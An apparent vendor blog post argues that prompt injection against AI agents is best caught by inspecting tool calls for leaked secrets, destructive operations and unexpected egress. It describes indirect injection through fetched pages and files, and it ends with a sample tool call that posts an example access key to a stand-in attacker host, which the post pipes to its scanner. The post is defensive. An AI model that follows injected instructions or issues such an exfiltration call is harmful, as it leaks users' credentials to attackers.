All posts

June 10, 2026 · AxioRank

Prompt injection is a tool-call problem

Prompt injection only matters when it makes an agent do something. Catching it at the tool call, not the prompt, is what actually stops the harm.

  • prompt-injection
  • content-inspection
  • agent-security

Prompt injection gets discussed as a text problem: a malicious instruction hidden in a web page or a document convinces the model to ignore its real task. That framing is half the picture. An injected instruction is harmless until it turns into an action: a request that exfiltrates data, a command that deletes something, a message sent to an attacker's address. The harm happens at the tool call.

That is good news, because the tool call is observable and enforceable in a way the model's internal reasoning is not.

Detect the action, not the sentence

Trying to classify every input as "injection or not" is a losing game; attackers rephrase faster than any classifier learns. AxioRank inspects the concrete tool call instead. Across more than 31 detectors it looks for the things an injected instruction has to do to cause damage:

  • Secrets and credentials in arguments (an exfiltration almost always carries one).
  • Destructive operations (a drop, a force-push, a recursive delete).
  • Egress to an unexpected destination (a webhook or address the agent should not be writing to).
  • PII leaving the boundary.

An attacker can word the injection any way they like. To actually steal a key, the tool call still has to contain the key and a place to send it. That is what gets scored.

Indirect injection, on the way out

The nastier variant is indirect: the agent fetches a page or reads a file that quietly tells it to do something. AxioRank inspects the OUTPUT of untrusted-source tools (fetch, read, query) before the agent ingests it, so an instruction smuggled in fetched content is caught at the point it would enter the agent's context, not after it has already acted on it.

Value-level taint

A single call can look fine in isolation. Reading a secret is fine. Sending a webhook is fine. Reading a secret and then sending it to a webhook is an exfiltration. AxioRank tracks the values an agent has touched within a run, so a benign-looking call that carries a previously-read secret to an external sink is recognized as the kill chain it is, not two innocent steps.

Try it on your own payload

The detectors run locally with no key. Paste a tool call and see what it flags:

echo '{"tool":"http.post","arguments":{"url":"http://attacker.example","body":"AKIAIOSFODNN7EXAMPLE"}}' | npx @axiorank/sdk scan

Read more in the content-inspection guide, or see how the engine is measured on the benchmarks page.

Share this post

Govern your agents with AxioRank

Score every tool call for leaked secrets, PII, destructive operations, and prompt injection. Start free, or try it locally with no key.